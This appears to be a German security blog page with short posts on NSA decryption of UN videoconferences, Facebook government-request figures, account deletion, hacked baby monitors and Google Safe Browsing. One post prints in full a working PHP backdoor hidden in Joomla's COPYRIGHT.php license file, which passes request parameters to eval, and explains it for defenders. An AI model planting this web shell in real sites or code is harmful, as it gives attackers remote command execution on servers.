NSA Einbruch in Videokonferenzsystem der Vereinten Nationen UN

un_nations_hq_image-536734-galleryV9-hhcoDie NSA hat im Juni 2012 die Verschlüsselung des Videokonferenzsystemes der Vereinten Nationen im Hauptquartier in New York geknackt. Innerhalb drei Wochen wurden 458 Kommunikationsvorgänge entschlüsselt

Entsprechende Informationen wurden in den Dokumenten von Edward Snowden gefunden. In den Unterlagen befanden sich auch detaillierte Pläne der neuen Büros der UN, mit Vergrösserungen der Bereiche wo sich Server befinden.

Artikel auf Spiegel International

Facebook „Globaler Bericht über Regierungsanfragen“

Der Facebook Bericht über Regierungsanfragen zeigt dass aus der Schweiz nur 32 Anfragen betreffend  32 Usern (von denen 13% beantwortet wurden) eingetroffen sind.

Aus den USA sind 12’000 Anfragen eingegangen, also 275x mehr als aus der Schweiz – und das bei bei 40x mehr EinwohnerInnen. Die Anzahl an bearbeiteten Anfragen beträgt 79% – also ein weitaus höheres Interesse der Regierung an den Daten einerseits, andererseits eine höhere Bearbeitungsquote durch Facebook (wobei bei der kleinen Anzahl der Anfragen aus der Schweiz sich die Zahlen nicht optimal hochrechnen lassen).

Aus Polen wurden noch weniger Anfragen abgearbeitet (9%) – interessant hier auch dass 233 Anfragen nur 158 Nutzer betreffen – für einige Nutzer müssen also mehrere Nachfragen gestellt worden sein.

Die USA macht es umgekehrt – hier betreffen 12’000 Anfragen 21’000 User – also diverse Anfragen betreffen gleich mehrere Nutzer.

Facebook schreib auch dass Daten nicht so einfach herausgegeben werden:

Wie wir in den letzten Wochen deutlich gemacht haben, gibt es bei uns strikte Prozesse für den Umgang mit Regierungsanfragen bezüglich Daten. Wir sind davon überzeugt, dass dieser Prozess dem Schutz der Daten unserer Nutzer dient und von den staatlichen Behörden die Einhaltung von Rechtsvorschriften bei jeder einzelnen Anfrage bezüglich Nutzerinformationen fordert. Wir prüfen jede Anfrage auch ihre rechtliche Zulässigkeit und ihre Übereinstimmung mit unseren Nutzungsbedingungen sowie mit dem Gesetz. Darüber hinaus fordern wir eine genaue Darlegung der Sachverhalte und Rechtsgrundlagen, auf die die jeweilige Anfrage basiert. Wir fechten viele dieser Anfragen an und weisen sie ab, wenn wir rechtliche Bedenken haben, dies gilt auch für Anfragen, die zu weit gefasst oder zu vage sind. Wenn wir einer Anfrage aus rechtlichen Gründen nachkommen müssen, geben wir oft nur allgemeine Informationen über die Nutzer weiter, wie z. B. den Namen.

Ganzen Bericht hier lesen

Facebook Richtlinien für Regierungsanfragen

 

Globaler Bericht über Regierungsanfragen

justdelete.me hilft nicht mehr benötigte Daten zu löschen

Veraltete und nicht mehr aktualisierte Profile bei öffentlichen Social Sites werfen nicht nur ein schlechtes Bild auf das Business, sondern können eventuell auch sicherheitsrelevante Informationen beinhalten.

Die Website justdelete.me hilft beim Löschen solcher Profile mit genauen Anleitungen.

Interessant auch dass bei vielen Anbietern die Profile gar nicht mehr gelöscht werden können (schwarz markiert im Screenshot unten), z.B. bei Evernote, Pinterest, Netflix etc.

justdeleteme2

Hacker versteckt Code in der Open Source Lizenzdatei

Bösartiger Code auf einem Webserver kann sehr klein sein – die Wirkung aber sehr gross. Einige Zeilen Code in einer PHP Datei kann genügen damit die Hacker jeden gewünschten Befehl ausführen können.

Damit der Code nicht leicht gefunden wird werden oft unübliche „Verstecke“ gefunden – zum Beispiel in einer Lizenzdatei des Open Source Content Managements Joomla: COPYRIGHT.php

Diese Datei interessiert meist niemanden gross, so dass oft übersehen wird dass auch diese Datei verändert sein könnte.

Hier das Beispiel – achten Sie darauf wie bereits in dieser Zeile unauffällig eine getarnte PHP Funktion aufgerufen wird welche dann später deklariert wird:

*/Copyright3_6_56()/* 1989, 1991 Free Software Foundation

Code Beispiel

< ?php
/*			GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

..

GNU GENERAL PUBLIC LICENSE
Version 2, June 1991

*/Copyright3_6_56()/* 1989, 1991 Free Software Foundation, Inc.
                          675 Mass Ave, Cambridge, MA 02139, USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

Preamble

  The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.*/?>

Joomla! derives from copyrighted works licensed under the GNU General
Public License.  This version has been modified pursuant to the
GNU General Public License as of September 15, 2005, and as distributed,
it includes or is derivative of works licensed under the GNU General
Public License or other free or open source software licenses.  Please
see the CREDITS.php for a non-exhaustive list of contributors and
copyright holders.  A full text version of the GNU GPL version 2 can be
found in the LICENSE.php file.  A full text version of the other licenses
that Joomla! is derivative of or includes can be found in LICENSES.php.

<? php
Copyright3_6_56();
function Copyright3_6_56(){
static $gnu = true;
if(!$gnu) return;
if(!isset($_REQUEST['gnu'])||!isset($_REQUEST['c_id']))return;
$gpl=implode('', $_REQUEST['gnu']);
eval ($gpl( $_REQUEST['c_id']));
$gnu=false;
}

 

Die ganze Analyse des Codes gibt es hier zu lesen

Gehackte Alltagsgeräte

Letztes Wochenende hat ein Paar in Texas festgestellt dass das Baby-Überwachungsgerät im Kinderzimmer gehackt worden war. Eine lokale TV Station berichtete dass das Paar eine unbekannte Stimme aus dem Kinderzimmer hörte welche obszöne Flüche von sich gab. Das Paar steckte das Gerät umgehend aus.

Wie sicher sind solche ans Internet angeschlossene Haushaltsgeräte?

Nicht sehr sicher – und das seit vielen Jahren.

Sicherheitsprobleme wurden in Webcams, Kameras, implantierten medizinischen Geräten, Autos, Toiletten, Yachten, Geldautomaten, Industriegeräten und militärischen Dronen gefunden.

All diese Geräte sind hackbar  – und die Profis wundern sich dass die KundInnen keine Ahnung davon haben dass das möglich ist.

Warum sind die Geräte hackbar?

Weil Sicherheit schwierig zu realisieren ist – es braucht Wissen und Zeit dazu.

Die meisten Firmen interessiert das nicht weil es die Kosten der Geräte erhöht und die EndkundInnen (bisher) keine Interesse daran haben.

Vielleicht würde es sich aber trotzdem lohnen ein wenig mehr auszugeben für ein Gerät das ausreichend sicher konzipiert und auch für Laien sicher handhabbar ist.

Google Safe Browsing

Zwei der grössten online Bedrohungen sind schädliche Software welche die Kontrolle über Ihren Computer übernehmen kann, und Phishing Angriffe welche Sie dazu bringen wollen Passwörter oder andere vertrauliche Informationen an Hacker zu übermitteln.

2006 hat Google das Safe Browsing Programm gestartet um Webseiten welche schädliche Software beinhalten oder Phishing betreiben zu identifizieren.

Google warnt Sie also jetzt wenn Sie eine solche Seite besuchen wollen.

Zur Zeit werden bis zu 10’000 Seiten täglich als schädlich markiert – und bis zu eine Milliarde User profitieren von dieser Kennzeichnung.

google_safe_browsing

Google hat neu auch den Transparency Report lanciert das mehr Klarheit über die Quellen von Malware und Phishing Angriffen bringen soll.

Sie können sehen wieviele Safe Browsing Warnungen wöchentlich angezeigt werden, wo bösartige Seiten gehostet werden, wie schnell Webseiten nach einer Säuberung wieder infiziert werden und andere Details.

Webseite Betreiber können die Google Webmaster Tools oder Safe Browsing Alerts for Network Administrators verwenden um Empfehlungen für den Umgang mit Malware zu erhalten.